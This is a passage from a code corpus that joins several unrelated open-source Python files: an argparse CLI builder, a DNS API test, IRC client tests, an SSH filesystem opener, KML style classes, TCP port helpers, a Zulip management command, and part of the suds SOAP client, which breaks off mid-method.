super(OrderNamespace, self).__init__(**kwargs)
def __setattr__(self, attr, value):
if value is not None:
self.__order__[attr] = value
super(OrderNamespace, self).__setattr__(attr, value)
def add_arguments(group, args):
"""
Add Arguments to CLI
"""
for kkk, vvv in args.iteritems():
if 'type' in vvv and vvv['type'] in type_map:
vvv['type'] = type_map[vvv['type']]
if 'help' in vvv and not vvv['help']:
vvv['help'] = argparse.SUPPRESS
changed = xform_name(kkk, "-")
if kkk != changed:
kkk = "-".join(["", changed])
group.add_argument(kkk, **vvv)
return group
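# Note on naming: an entry called "MaxCount" is registered as the option
# "-max-count" (xform_name dash-cases CamelCase), while an already-lowercase
# name such as "count" is left as-is and therefore becomes a positional
# argument.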
def recursive_parser(parser, args):
"""
Recursive CLI Parser
"""
subparser = parser.add_subparsers(help=args.get(
'__help__', ''), dest=args.get('__dest__', ''))
for k, v in args.iteritems():
if k == '__help__' or k == '__dest__':
continue
group = subparser.add_parser(k, help=v.get('help', ''))
for kk, vv in v.iteritems():
if kk == 'Subparsers':
group = recursive_parser(group, vv)
elif kk == 'Arguments':
group = add_arguments(group, vv)
return parser
def parse_args(args):
"""
Create the Command Line Interface
:type args: dict
:param args: describes the command structure for the CLI
"""
parser = argparse.ArgumentParser(description=args.get('Description', ''))
for k, v in args.iteritems():
if k == 'Subparsers':
parser = recursive_parser(parser, v)
elif k == 'Arguments':
parser = add_arguments(parser, v)
autocomplete(parser)
return parser.parse_args(None, OrderNamespace())
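if __name__ == '__main__':
    # A minimal, hypothetical command description -- real trees are normally
    # generated from JSON service models.
    demo = {
        'Description': 'Demo CLI',
        'Arguments': {'MaxCount': {'type': 'integer', 'help': 'repeat count'}},
    }
    print parse_args(demo)  # exposes "-max-count" on the command line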
# vim: tabstop=4 shiftwidth=4 softtabstop=4
| henrysher/opslib | opslib/icsutils/jsoncli.py | Python | apache-2.0 | 2,568 | 0 |
# Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Author: Kiall Mac Innes <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from designate.tests.test_api.test_v2 import ApiV2TestCase
class ApiV2LimitsTest(ApiV2TestCase):
def test_get_limits(self):
response = self.client.get('/limits/')
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertIn('max_zones', response.json)
self.assertIn('max_zone_records', response.json)
self.assertIn('max_zone_recordsets',
response.json)
self.assertIn('max_recordset_records',
response.json)
self.assertIn('min_ttl', response.json)
self.assertIn('max_zone_name_length',
response.json)
self.assertIn('max_recordset_name_length',
response.json)
self.assertIn('max_page_limit',
response.json)
absolutelimits = response.json
self.assertEqual(cfg.CONF.quota_zones, absolutelimits['max_zones'])
self.assertEqual(cfg.CONF.quota_zone_records,
absolutelimits['max_zone_recordsets'])
self.assertEqual(cfg.CONF['service:central'].min_ttl,
absolutelimits['min_ttl'])
self.assertEqual(cfg.CONF['service:central'].max_zone_name_len,
absolutelimits['max_zone_name_length'])
self.assertEqual(cfg.CONF['service:central'].max_recordset_name_len,
absolutelimits['max_recordset_name_length'])
self.assertEqual(cfg.CONF['service:api'].max_limit_v2,
absolutelimits['max_page_limit'])
| grahamhayes/designate | designate/tests/test_api/test_v2/test_limits.py | Python | apache-2.0 | 2,306 | 0 |
def test_connect(client, connect):
"""Connect client triggers client_connect"""
connect()
assert client.triggers['CLIENT_CONNECT'] == 1
def test_ping_pong(client, server, connect, flush):
connect()
server.write("PING :ping-message")
client.send("PONG")
# Protocol doesn't advance until loop flushes
assert not client.triggers["PING"]
assert not server.received
flush()
flush()
# Both should have been received now
assert client.triggers["PING"] == 1
assert server.received == ["PONG"]
| numberoverzero/bottom | tests/integ/test_local.py | Python | mit | 546 | 0 |
# coding: utf-8
from __future__ import unicode_literals
from __future__ import absolute_import
import configparser
import six
from .base import Opener
from .registry import registry
from ..subfs import ClosingSubFS
from ..errors import FSError, CreateFailed
__license__ = "LGPLv2+"
__copyright__ = "Copyright (c) 2017-2021 Martin Larralde"
__author__ = "Martin Larralde <[email protected]>"
__version__ = (
__import__("pkg_resources")
.resource_string("fs.sshfs", "_version.txt")
.strip()
.decode("ascii")
)
class SSHOpener(Opener):
protocols = ['ssh']
@staticmethod
def open_fs(fs_url, parse_result, writeable, create, cwd):
from ..sshfs import SSHFS
ssh_host, _, dir_path = parse_result.resource.partition('/')
ssh_host, _, ssh_port = ssh_host.partition(':')
ssh_port = int(ssh_port) if ssh_port.isdigit() else 22
params = configparser.ConfigParser()
        params.read_dict({'sshfs': getattr(parse_result, 'params', {})})
ssh_fs = SSHFS(
ssh_host,
user=parse_result.username,
passwd=parse_result.password,
pkey=params.get('sshfs', 'pkey', fallback=None),
timeout=params.getint('sshfs', 'timeout', fallback=10),
port=ssh_port,
keepalive=params.getint('sshfs', 'keepalive', fallback=10),
compress=params.getboolean('sshfs', 'compress', fallback=False),
config_path=\
params.get('sshfs', 'config_path', fallback='~/.ssh/config'),
exec_timeout=params.getint('sshfs', 'timeout', fallback=None),
)
try:
if dir_path:
if create:
ssh_fs.makedirs(dir_path, recreate=True)
return ssh_fs.opendir(dir_path, factory=ClosingSubFS)
else:
return ssh_fs
except Exception as err:
six.raise_from(CreateFailed, err)
registry.install(SSHOpener)
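# With the opener registered, an SSH filesystem can be opened through the
# standard FS URL machinery, e.g. (host and credentials illustrative):
#
#   import fs
#   my_fs = fs.open_fs("ssh://user:[email protected]:2222/home/user?timeout=30")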
| althonos/fs.sshfs | fs/opener/sshfs.py | Python | lgpl-2.1 | 1,998 | 0.002002 |
"""
Copyright 2011-2014 Kyle Lancaster
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Contact me at [email protected]
"""
from simplekml.base import Kmlable, check
from simplekml.substyle import IconStyle, LabelStyle, LineStyle, PolyStyle, BalloonStyle, ListStyle
class StyleSelector(Kmlable):
"""Abstract style class, extended by :class:`simplekml.Style` and :class:`simplekml.StyleMap`
There are no arguments.
"""
_id = 0
def __init__(self):
super(StyleSelector, self).__init__()
self._id = "stylesel_{0}".format(StyleSelector._id)
StyleSelector._id += 1
@property
def id(self):
"""The id of the style, read-only."""
return self._id
class Style(StyleSelector):
"""Styles affect how Geometry is presented.
Arguments are the same as the properties.
Usage::
import simplekml
kml = simplekml.Kml()
pnt = kml.newpoint(name='A Point')
pnt.coords = [(1.0, 2.0)]
pnt.style.labelstyle.color = simplekml.Color.red # Make the text red
pnt.style.labelstyle.scale = 2 # Make the text twice as big
pnt.style.iconstyle.icon.href = 'http://maps.google.com/mapfiles/kml/shapes/placemark_circle.png'
kml.save("Style.kml")
"""
def __init__(self,
iconstyle=None,
labelstyle=None,
linestyle=None,
polystyle=None,
balloonstyle=None,
liststyle=None):
super(Style, self).__init__()
self._kml["IconStyle_"] = iconstyle
self._kml["LabelStyle_"] = labelstyle
self._kml["LineStyle_"] = linestyle
self._kml["PolyStyle_"] = polystyle
self._kml["BalloonStyle"] = balloonstyle
self._kml["ListStyle"] = liststyle
def __str__(self):
return '<Style id="{0}">{1}</Style>'.format(self._id, super(Style, self).__str__())
@property
def iconstyle(self):
"""The iconstyle, accepts :class:`simplekml.IconStyle`."""
if self._kml["IconStyle_"] is None:
self._kml["IconStyle_"] = IconStyle()
return self._kml["IconStyle_"]
@iconstyle.setter
@check(IconStyle)
def iconstyle(self, iconstyle):
self._kml["IconStyle_"] = iconstyle
@property
def labelstyle(self):
"""The labelstyle, accepts :class:`simplekml.LabelStyle`."""
if self._kml["LabelStyle_"] is None:
self._kml["LabelStyle_"] = LabelStyle()
return self._kml["LabelStyle_"]
@labelstyle.setter
@check(LabelStyle)
def labelstyle(self, labelstyle):
self._kml["LabelStyle_"] = labelstyle
@property
def linestyle(self):
"""The linestyle, accepts :class:`simplekml.LineStyle`."""
if self._kml["LineStyle_"] is None:
self._kml["LineStyle_"] = LineStyle()
return self._kml["LineStyle_"]
@linestyle.setter
@check(LineStyle)
def linestyle(self, linestyle):
self._kml["LineStyle_"] = linestyle
@property
def polystyle(self):
"""The polystyle, accepts :class:`simplekml.PolyStyle`."""
if self._kml["PolyStyle_"] is None:
self._kml["PolyStyle_"] = PolyStyle()
return self._kml["PolyStyle_"]
@polystyle.setter
@check(PolyStyle)
def polystyle(self, polystyle):
self._kml["PolyStyle_"] = polystyle
@property
def balloonstyle(self):
"""The balloonstyle, accepts :class:`simplekml.BalloonStyle`."""
if self._kml["BalloonStyle"] is None:
self._kml["BalloonStyle"] = BalloonStyle()
return self._kml["BalloonStyle"]
@balloonstyle.setter
@check(BalloonStyle)
def balloonstyle(self, balloonstyle):
self._kml["BalloonStyle"] = balloonstyle
@property
def liststyle(self):
"""The liststyle, accepts :class:`simplekml.ListStyle`."""
if self._kml["ListStyle"] is None:
self._kml["ListStyle"] = ListStyle()
return self._kml["ListStyle"]
@liststyle.setter
@check(ListStyle)
def liststyle(self, liststyle):
self._kml["ListStyle"] = liststyle
class StyleMap(StyleSelector):
"""Styles affect how Geometry is presented.
Arguments are the same as the properties.
Usage::
import simplekml
kml = simplekml.Kml()
pnt = kml.newpoint(coords=[(18.432314,-33.988862)])
pnt.stylemap.normalstyle.labelstyle.color = simplekml.Color.blue
pnt.stylemap.highlightstyle.labelstyle.color = simplekml.Color.red
kml.save("StyleMap.kml")
"""
def __init__(self,
normalstyle=None,
highlightstyle=None):
super(StyleMap, self).__init__()
self._pairnormal = None
self._pairhighlight = None
self.normalstyle = normalstyle
self.highlightstyle = highlightstyle
def __str__(self):
buf = ['<StyleMap id="{0}">'.format(self._id),
super(StyleMap, self).__str__()]
if self._pairnormal is not None:
buf.append("<Pair>")
buf.append("<key>normal</key>")
buf.append("<styleUrl>#{0}</styleUrl>".format(self._pairnormal._id))
buf.append("</Pair>")
if self._pairhighlight is not None:
buf.append("<Pair>")
buf.append("<key>highlight</key>")
buf.append("<styleUrl>#{0}</styleUrl>".format(self._pairhighlight._id))
buf.append("</Pair>")
buf.append("</StyleMap>")
return "".join(buf)
@property
def normalstyle(self):
"""The normal :class:`simplekml.Style`, accepts :class:`simplekml.Style`."""
if self._pairnormal is None:
self._pairnormal = Style()
return self._pairnormal
@normalstyle.setter
@check(Style)
def normalstyle(self, normal):
self._pairnormal = normal
@property
def highlightstyle(self):
"""The highlighted :class:`simplekml.Style`, accepts :class:`simplekml.Style`."""
if self._pairhighlight is None:
self._pairhighlight = Style()
return self._pairhighlight
@highlightstyle.setter
@check(Style)
    def highlightstyle(self, highlightstyle):
        self._pairhighlight = highlightstyle
| EdFarrell/MilkMachine | src/MilkMachine/simplekml/styleselector.py | Python | gpl-3.0 | 6,912 | 0.002315 |
# Programmer friendly subprocess wrapper.
#
# Author: Peter Odding <[email protected]>
# Last Change: March 2, 2020
# URL: https://executor.readthedocs.io
"""
Miscellaneous TCP networking functionality.
The functionality in this module originated in the :class:`executor.ssh.server`
module with the purpose of facilitating a robust automated test suite for the
:class:`executor.ssh.client` module. While working on SSH tunnel support I
needed similar logic again and I decided to extract this code from the
:class:`executor.ssh.server` module.
"""
# Standard library modules.
import itertools
import logging
import random
import socket
# Modules included in our package.
from executor import ExternalCommand
# External dependencies.
from humanfriendly import Timer, format_timespan
from humanfriendly.terminal.spinners import Spinner
from humanfriendly.text import format, pluralize
from property_manager import (
PropertyManager,
lazy_property,
mutable_property,
required_property,
set_property,
)
# Public identifiers that require documentation.
__all__ = (
'EphemeralPortAllocator',
'EphemeralTCPServer',
'TimeoutError',
'WaitUntilConnected',
'logger',
)
# Initialize a logger.
logger = logging.getLogger(__name__)
class WaitUntilConnected(PropertyManager):
"""Wait for a TCP endpoint to start accepting connections."""
@mutable_property
def connect_timeout(self):
"""The timeout in seconds for individual connection attempts (a number, defaults to 2)."""
return 2
@property
def endpoint(self):
"""A human friendly representation of the TCP endpoint (a string containing a URL)."""
return format("%s://%s:%i", self.scheme, self.hostname, self.port_number)
@mutable_property
def hostname(self):
"""The host name or IP address to connect to (a string, defaults to ``localhost``)."""
return 'localhost'
@property
def is_connected(self):
""":data:`True` if a connection was accepted, :data:`False` otherwise."""
timer = Timer()
logger.debug("Checking whether %s is accepting connections ..", self.endpoint)
try:
            handle = socket.create_connection((self.hostname, self.port_number), self.connect_timeout)
            handle.close()
logger.debug("Yes %s is accepting connections (took %s).", self.endpoint, timer)
return True
except Exception:
logger.debug("No %s isn't accepting connections (took %s).", self.endpoint, timer)
return False
@required_property
def port_number(self):
"""The port number to connect to (an integer)."""
@mutable_property
def scheme(self):
"""A URL scheme that indicates the purpose of the ephemeral port (a string, defaults to 'tcp')."""
return 'tcp'
@mutable_property
def wait_timeout(self):
"""The timeout in seconds for :func:`wait_until_connected()` (a number, defaults to 30)."""
return 30
def wait_until_connected(self):
"""
Wait until connections are being accepted.
:raises: :exc:`TimeoutError` when the SSH server isn't fast enough to
initialize.
"""
timer = Timer()
with Spinner(timer=timer) as spinner:
while not self.is_connected:
if timer.elapsed_time > self.wait_timeout:
raise TimeoutError(format(
"Failed to establish connection to %s within configured timeout of %s!",
self.endpoint, format_timespan(self.wait_timeout),
))
spinner.step(label="Waiting for %s to accept connections" % self.endpoint)
spinner.sleep()
logger.debug("Waited %s for %s to accept connections.", timer, self.endpoint)
class EphemeralPortAllocator(WaitUntilConnected):
"""
Allocate a free `ephemeral port number`_.
.. _ephemeral port number: \
http://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers#Dynamic.2C_private_or_ephemeral_ports
"""
@lazy_property
def port_number(self):
"""A dynamically selected free ephemeral port number (an integer between 49152 and 65535)."""
timer = Timer()
logger.debug("Looking for free ephemeral port number ..")
for i in itertools.count(1):
value = self.ephemeral_port_number
set_property(self, 'port_number', value)
if not self.is_connected:
logger.debug("Found free ephemeral port number %s after %s (took %s).",
value, pluralize(i, "attempt"), timer)
return value
@property
def ephemeral_port_number(self):
"""A random ephemeral port number (an integer between 49152 and 65535)."""
return random.randint(49152, 65535)
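# Usage sketch: allocate a free port before handing it to a server process.
# The value is computed lazily and cached on first attribute access.
def _example_allocate_port():
    allocator = EphemeralPortAllocator()
    return allocator.port_number  # e.g. 54321; verified unused when probed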
class EphemeralTCPServer(ExternalCommand, EphemeralPortAllocator):
"""
Make it easy to launch ephemeral TCP servers.
The :class:`EphemeralTCPServer` class makes it easy to allocate an
`ephemeral port number`_ that is not (yet) in use.
.. _ephemeral port number: \
http://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers#Dynamic.2C_private_or_ephemeral_ports
"""
@property
def asynchronous(self):
"""Ephemeral TCP servers always set :attr:`.ExternalCommand.asynchronous` to :data:`True`."""
return True
def start(self, **options):
"""
Start the TCP server and wait for it to start accepting connections.
:param options: Any keyword arguments are passed to the
:func:`~executor.ExternalCommand.start()` method of the
superclass.
:raises: Any exceptions raised by :func:`~executor.ExternalCommand.start()`
and :func:`~executor.tcp.WaitUntilConnected.wait_until_connected()`.
If the TCP server doesn't start accepting connections within the
configured timeout (see :attr:`~executor.tcp.WaitUntilConnected.wait_timeout`)
the process will be terminated and the timeout exception is propagated.
"""
if not self.was_started:
logger.debug("Preparing to start %s server ..", self.scheme.upper())
super(EphemeralTCPServer, self).start(**options)
try:
self.wait_until_connected()
except TimeoutError:
self.terminate()
raise
class TimeoutError(Exception):
"""
Raised when a TCP server doesn't start accepting connections quickly enough.
This exception is raised by :func:`~executor.tcp.WaitUntilConnected.wait_until_connected()`
when the TCP server doesn't start accepting connections within a reasonable time.
"""
| xolox/python-executor | executor/tcp.py | Python | mit | 6,803 | 0.003675 |
from typing import Any
from argparse import ArgumentParser
from zerver.lib.actions import do_rename_stream
from zerver.lib.str_utils import force_text
from zerver.lib.management import ZulipBaseCommand
from zerver.models import get_stream
import sys
class Command(ZulipBaseCommand):
help = """Change the stream name for a realm."""
def add_arguments(self, parser):
# type: (ArgumentParser) -> None
parser.add_argument('old_name', metavar='<old name>', type=str,
help='name of stream to be renamed')
parser.add_argument('new_name', metavar='<new name>', type=str,
help='new name to rename the stream to')
self.add_realm_args(parser, True)
def handle(self, *args, **options):
# type: (*Any, **str) -> None
realm = self.get_realm(options)
assert realm is not None # Should be ensured by parser
old_name = options['old_name']
new_name = options['new_name']
encoding = sys.getfilesystemencoding()
stream = get_stream(force_text(old_name, encoding), realm)
do_rename_stream(stream, force_text(new_name, encoding))
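# Example invocation (stream and realm names are placeholders; the realm
# flag is whatever ZulipBaseCommand.add_realm_args registers):
#
#   ./manage.py rename_stream 'old stream name' 'new stream name' -r zulip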
| amanharitsh123/zulip | zerver/management/commands/rename_stream.py | Python | apache-2.0 | 1,181 | 0.000847 |
# This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: Jeff Ortel ( [email protected] )
"""
The I{2nd generation} service proxy provides access to web services.
See I{README.txt}
"""
import suds
import suds.metrics as metrics
from cookielib import CookieJar
from suds import *
from suds.reader import DefinitionsReader
from suds.transport import TransportError, Request
from suds.transport.https import HttpAuthenticated
from suds.servicedefinition import ServiceDefinition
from suds import sudsobject
from sudsobject import Factory as InstFactory
from sudsobject import Object
from suds.resolver import PathResolver
from suds.builder import Builder
from suds.wsdl import Definitions
from suds.cache import ObjectCache
from suds.sax.document import Document
from suds.sax.parser import Parser
from suds.options import Options
from suds.properties import Unskin
from urlparse import urlparse
from copy import deepcopy
from suds.plugin import PluginContainer
from logging import getLogger
log = getLogger(__name__)
class Client(object):
"""
A lightweight web services client.
I{(2nd generation)} API.
@ivar wsdl: The WSDL object.
@type wsdl:L{Definitions}
@ivar service: The service proxy used to invoke operations.
@type service: L{Service}
@ivar factory: The factory used to create objects.
@type factory: L{Factory}
@ivar sd: The service definition
@type sd: L{ServiceDefinition}
@ivar messages: The last sent/received messages.
@type messages: str[2]
"""
@classmethod
def items(cls, sobject):
"""
Extract the I{items} from a suds object much like the
items() method works on I{dict}.
@param sobject: A suds object
@type sobject: L{Object}
@return: A list of items contained in I{sobject}.
@rtype: [(key, value),...]
"""
return sudsobject.items(sobject)
@classmethod
def dict(cls, sobject):
"""
Convert a sudsobject into a dictionary.
@param sobject: A suds object
@type sobject: L{Object}
@return: A python dictionary containing the
items contained in I{sobject}.
@rtype: dict
"""
return sudsobject.asdict(sobject)
@classmethod
def metadata(cls, sobject):
"""
Extract the metadata from a suds object.
@param sobject: A suds object
@type sobject: L{Object}
@return: The object's metadata
@rtype: L{sudsobject.Metadata}
"""
return sobject.__metadata__
def __init__(self, url, **kwargs):
"""
@param url: The URL for the WSDL.
@type url: str
@param kwargs: keyword arguments.
@see: L{Options}
"""
options = Options()
options.transport = HttpAuthenticated()
self.options = options
options.cache = ObjectCache(days=1)
self.set_options(**kwargs)
reader = DefinitionsReader(options, Definitions)
self.wsdl = reader.open(url)
plugins = PluginContainer(options.plugins)
plugins.init.initialized(wsdl=self.wsdl)
self.factory = Factory(self.wsdl)
self.service = ServiceSelector(self, self.wsdl.services)
self.sd = []
for s in self.wsdl.services:
sd = ServiceDefinition(self.wsdl, s)
self.sd.append(sd)
self.messages = dict(tx=None, rx=None)
def set_options(self, **kwargs):
"""
Set options.
@param kwargs: keyword arguments.
@see: L{Options}
"""
p = Unskin(self.options)
p.update(kwargs)
def add_prefix(self, prefix, uri):
"""
Add I{static} mapping of an XML namespace prefix to a namespace.
This is useful for cases when a wsdl and referenced schemas make heavy
        use of namespaces and those namespaces are subject to change.
@param prefix: An XML namespace prefix.
@type prefix: str
@param uri: An XML namespace URI.
@type uri: str
@raise Exception: when prefix is already mapped.
"""
root = self.wsdl.root
mapped = root.resolvePrefix(prefix, None)
if mapped is None:
root.addPrefix(prefix, uri)
return
if mapped[1] != uri:
raise Exception('"%s" already mapped as "%s"' % (prefix, mapped))
def last_sent(self):
"""
Get last sent I{soap} message.
@return: The last sent I{soap} message.
@rtype: L{Document}
"""
return self.messages.get('tx')
def last_received(self):
"""
Get last received I{soap} message.
@return: The last received I{soap} message.
@rtype: L{Document}
"""
return self.messages.get('rx')
def clone(self):
"""
Get a shallow clone of this object.
The clone only shares the WSDL. All other attributes are
unique to the cloned object including options.
@return: A shallow clone.
@rtype: L{Client}
"""
class Uninitialized(Client):
def __init__(self):
pass
clone = Uninitialized()
clone.options = Options()
cp = Unskin(clone.options)
mp = Unskin(self.options)
cp.update(deepcopy(mp))
clone.wsdl = self.wsdl
clone.factory = self.factory
clone.service = ServiceSelector(clone, self.wsdl.services)
clone.sd = self.sd
clone.messages = dict(tx=None, rx=None)
return clone
def __str__(self):
return unicode(self)
def __unicode__(self):
s = ['\n']
build = suds.__build__.split()
s.append('Suds ( https://fedorahosted.org/suds/ )')
s.append(' version: %s' % suds.__version__)
s.append(' %s build: %s' % (build[0], build[1]))
for sd in self.sd:
s.append('\n\n%s' % unicode(sd))
return ''.join(s)
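# Usage sketch (the WSDL URL, type name and method name are placeholders,
# not part of this module):
def _example_client_usage():
    client = Client('http://example.com/service?wsdl')
    print client                               # dump services and methods
    person = client.factory.create('Person')   # build a WSDL-defined type
    person.name = 'Ada'
    return client.service.addPerson(person)    # invoke a service method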
class Factory:
"""
A factory for instantiating types defined in the wsdl
@ivar resolver: A schema type resolver.
@type resolver: L{PathResolver}
@ivar builder: A schema object builder.
@type builder: L{Builder}
"""
def __init__(self, wsdl):
"""
@param wsdl: A schema object.
@type wsdl: L{wsdl.Definitions}
"""
self.wsdl = wsdl
self.resolver = PathResolver(wsdl)
self.builder = Builder(self.resolver)
def create(self, name):
"""
create a WSDL type by name
@param name: The name of a type defined in the WSDL.
@type name: str
@return: The requested object.
@rtype: L{Object}
"""
timer = metrics.Timer()
timer.start()
type = self.resolver.find(name)
if type is None:
raise TypeNotFound(name)
if type.enum():
result = InstFactory.object(name)
for e, a in type.children():
setattr(result, e.name, e.name)
else:
try:
result = self.builder.build(type)
except Exception, e:
log.error("create '%s' failed", name, exc_info=True)
raise BuildError(name, e)
timer.stop()
metrics.log.debug('%s created: %s', name, timer)
return result
def separator(self, ps):
"""
Set the path separator.
@param ps: The new path separator.
@type ps: char
"""
self.resolver = PathResolver(self.wsdl, ps)
class ServiceSelector:
"""
The B{service} selector is used to select a web service.
In most cases, the wsdl only defines (1) service in which access
by subscript is passed through to a L{PortSelector}. This is also the
behavior when a I{default} service has been specified. In cases
where multiple services have been defined and no default has been
specified, the service is found by name (or index) and a L{PortSelector}
for the service is returned. In all cases, attribute access is
forwarded to the L{PortSelector} for either the I{first} service or the
I{default} service (when specified).
@ivar __client: A suds client.
@type __client: L{Client}
@ivar __services: A list of I{wsdl} services.
@type __services: list
"""
def __init__(self, client, services):
"""
@param client: A suds client.
@type client: L{Client}
@param services: A list of I{wsdl} services.
@type services: list
"""
self.__client = client
self.__services = services
def __getattr__(self, name):
"""
Request to access an attribute is forwarded to the
L{PortSelector} for either the I{first} service or the
I{default} service (when specified).
@param name: The name of a method.
@type name: str
@return: A L{PortSelector}.
@rtype: L{PortSelector}.
"""
default = self.__ds()
if default is None:
port = self.__find(0)
else:
port = default
return getattr(port, name)
def __getitem__(self, name):
"""
Provides selection of the I{service} by name (string) or
index (integer). In cases where only (1) service is defined
or a I{default} has been specified, the request is forwarded
to the L{PortSelector}.
@param name: The name (or index) of a service.
@type name: (int|str)
@return: A L{PortSelector} for the specified service.
@rtype: L{PortSelector}.
"""
if len(self.__services) == 1:
port = self.__find(0)
return port[name]
default = self.__ds()
if default is not None:
port = default
return port[name]
return self.__find(name)
def __find(self, name):
"""
Find a I{service} by name (string) or index (integer).
@param name: The name (or index) of a service.
@type name: (int|str)
@return: A L{PortSelector} for the found service.
@rtype: L{PortSelector}.
"""
service = None
if not len(self.__services):
raise Exception, 'No services defined'
if isinstance(name, int):
try:
service = self.__services[name]
name = service.name
except IndexError:
raise ServiceNotFound, 'at [%d]' % name
else:
for s in self.__services:
if name == s.name:
service = s
break
if service is None:
raise ServiceNotFound, name
return PortSelector(self.__client, service.ports, name)
def __ds(self):
"""
Get the I{default} service if defined in the I{options}.
@return: A L{PortSelector} for the I{default} service.
@rtype: L{PortSelector}.
"""
ds = self.__client.options.service
if ds is None:
return None
else:
return self.__find(ds)
class PortSelector:
"""
The B{port} selector is used to select a I{web service} B{port}.
In cases where multiple ports have been defined and no default has been
specified, the port is found by name (or index) and a L{MethodSelector}
for the port is returned. In all cases, attribute access is
forwarded to the L{MethodSelector} for either the I{first} port or the
I{default} port (when specified).
@ivar __client: A suds client.
@type __client: L{Client}
@ivar __ports: A list of I{service} ports.
@type __ports: list
@ivar __qn: The I{qualified} name of the port (used for logging).
@type __qn: str
"""
def __init__(self, client, ports, qn):
"""
@param client: A suds client.
@type client: L{Client}
@param ports: A list of I{service} ports.
@type ports: list
@param qn: The name of the service.
@type qn: str
"""
self.__client = client
self.__ports = ports
self.__qn = qn
def __getattr__(self, name):
"""
Request to access an attribute is forwarded to the
L{MethodSelector} for either the I{first} port or the
I{default} port (when specified).
@param name: The name of a method.
@type name: str
@return: A L{MethodSelector}.
@rtype: L{MethodSelector}.
"""
default = self.__dp()
if default is None:
m = self.__find(0)
else:
m = default
return getattr(m, name)
def __getitem__(self, name):
"""
Provides selection of the I{port} by name (string) or
index (integer). In cases where only (1) port is defined
or a I{default} has been specified, the request is forwarded
to the L{MethodSelector}.
@param name: The name (or index) of a port.
@type name: (int|str)
@return: A L{MethodSelector} for the specified port.
@rtype: L{MethodSelector}.
"""
default = self.__dp()
if default is None:
return self.__find(name)
else:
return default
def __find(self, name):
"""
Find a I{port} by name (string) or index (integer).
@param name: The name (or index) of a port.
@type name: (int|str)
@return: A L{MethodSelector} for the found port.
@rtype: L{MethodSelector}.
"""
port = None
if not len(self.__ports):
raise Exception, 'No ports defined: %s' % self.__qn
if isinstance(name, int):
qn = '%s[%d]' % (self.__qn, name)
try:
port = self.__ports[name]
except IndexError:
raise PortNotFound, qn
else:
qn = '.'.join((self.__qn, name))
for p in self.__ports:
if name == p.name:
port = p
break
if port is None:
raise PortNotFound, qn
qn = '.'.join((self.__qn, port.name))
return MethodSelector(self.__client, port.methods, qn)
def __dp(self):
"""
Get the I{default} port if defined in the I{options}.
@return: A L{MethodSelector} for the I{default} port.
@rtype: L{MethodSelector}.
"""
dp = self.__client.options.port
if dp is None:
return None
else:
return self.__find(dp)
class MethodSelector:
"""
The B{method} selector is used to select a B{method} by name.
@ivar __client: A suds client.
@type __client: L{Client}
@ivar __methods: A dictionary of methods.
@type __methods: dict
@ivar __qn: The I{qualified} name of the method (used for logging).
@type __qn: str
"""
def __init__(self, client, methods, qn):
"""
@param client: A suds client.
@type client: L{Client}
@param methods: A dictionary of methods.
@type methods: dict
@param qn: The I{qualified} name of the port.
@type qn: str
"""
self.__client = client
self.__methods = methods
self.__qn = qn
def __getattr__(self, name):
"""
Get a method by name and return it in an I{execution wrapper}.
@param name: The name of a method.
@type name: str
@return: An I{execution wrapper} for the specified method name.
@rtype: L{Method}
"""
return self[name]
def __getitem__(self, name):
"""
Get a method by name and return it in an I{execution wrapper}.
@param name: The name of a method.
@type name: str
@return: An I{execution wrapper} for the specified method name.
@rtype: L{Method}
"""
m = self.__methods.get(name)
if m is None:
qn = '.'.join((self.__qn, name))
raise MethodNotFound, qn
return Method(self.__client, m)
class Method:
"""
The I{method} (namespace) object.
@ivar client: A client object.
@type client: L{Client}
@ivar method: A I{wsdl} method.
    @type method: I{wsdl} Method.
"""
def __init__(self, client, method):
"""
@param client: A client object.
@type client: L{Client}
@param method: A I{raw} method.
        @type method: I{raw} Method.
"""
self.client = client
self.method = method
def __call__(self, *args, **kwargs):
"""
Invoke the method.
"""
clientclass = self.clientclass(kwargs)
client = clientclass(self.client, self.method)
if not self.faults():
try:
return client.invoke(args, kwargs)
except WebFault, e:
return (500, e)
else:
return client.invoke(args, kwargs)
def faults(self):
""" get faults option """
return self.client.options.faults
def clientclass(self, kwargs):
""" get soap client class """
if SimClient.simulation(kwargs):
return SimClient
else:
return SoapClient
class SoapClient:
"""
A lightweight soap based web client B{**not intended for external use}
@ivar service: The target method.
@type service: L{Service}
@ivar method: A target method.
@type method: L{Method}
    @ivar options: A dictionary of options.
@type options: dict
@ivar cookiejar: A cookie jar.
@type cookiejar: libcookie.CookieJar
"""
def __init__(self, client, method):
"""
@param client: A suds client.
@type client: L{Client}
@param method: A target method.
@type method: L{Method}
"""
self.client = client
self.method = method
self.options = client.options
self.cookiejar = CookieJar()
def invoke(self, args, kwargs):
"""
Send the required soap message to invoke the specified method
@param args: A list of args for the method invoked.
@type args: list
@param kwargs: Named (keyword) args for the method invoked.
@type kwargs: dict
@return: The result of the method invocation.
@rtype: I{builtin}|I{subclass of} L{Object}
"""
timer = metrics.Timer()
timer.start()
result = None
